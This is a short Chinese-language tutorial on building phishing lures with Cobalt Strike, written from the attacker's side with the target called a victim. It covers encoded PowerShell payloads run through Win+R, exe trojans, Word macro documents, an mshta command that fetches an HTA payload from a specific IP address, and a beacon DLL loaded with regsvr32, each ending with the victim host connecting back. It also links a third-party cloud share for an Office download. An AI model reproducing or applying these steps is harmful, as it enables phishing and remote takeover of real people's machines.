钓鱼鱼饵制作的方式
Powershell上线
步骤:有效载荷--->Payload⽣成器--->选择Powershell Command--->⽣成
会在当前⽬录下⽣成⼀个txt⽂本,内容为编码后的payload。
复制后在⽬标主机Win+R输⼊powershell,然后运⾏上⾯内容,即可成功上线。
exe⽊⻢上线
⽣成后会保存到指定地⽅,通过某种⽅式上传到对⽅机器上,可以通过Webshell⽅式等这⾥不在讲解了受害者运⾏exe⽂件我们的CS就直接上线了
减少延迟
正常我们进去需要调整响应的时间
Word宏⽂档钓⻥上线
在做宏⽂档之前,我们需要下载office,因为CS⽬前只⽀持Office下的宏⽂档上线,⽽WPS的暂不⽀持
office下载:https://cloud.189.cn/web/share?code=UVje6vzmIjqi 访问码: f9sl
宏是⼀个批量处理程序命令,正确地运⽤它可以提⾼⼯作效率。微软的office软件允许⽤户⾃⼰编写,叫VBA的脚本来增加其灵活性,进⼀步扩充它的能⼒。 简单来说WORD宏可以让⽤户编写VBA脚本来灵活操作WORD,是Office软件设计者为了让⼈们使⽤软件进⾏⼯作时,避免⼀再重复相同的动作,⽽设计出来的⼀种⼯具。 宏病毒是⼀种常⻅的计算机病毒,寄存在⽂档或模板中,并不会直接感染可执⾏程序。但是打开携带宏病毒的⽂档,其中的命令就会被执⾏,导致⽂档所在电脑主机被感染。
宏钓⻥⽣成过程
CobaltStrike--->有效载荷--->office宏--->选择监听器--->复制
将⽣成的⽂件内容进⾏复制。
创建Word⽂件--->视图--->宏(查看宏)--->创建宏--->复制宏代码--->保存
需要勾选启⽤所有宏。
点击文件
再次打开后即可上线
mshta上线
有效载荷--->HTA⽂档--->⽣成
保存⽂件到本地。
站点管理--->⽂件托管--->选择⽣成的⽂件
点击运行
复制链接,在靶机执⾏
mshta http://8.140.254.245:80/download/fil.ext
DLL⽂件上线
有效载荷--->windows可执⾏程序(stageless)--->Output选择windows dll--->⽣成dll⽂件
将⽣成的dll⽂件上传到靶机,然后在靶机注册dll⽂件。
执⾏:regsvr32 beacon_x64.dll
靶机成功上线。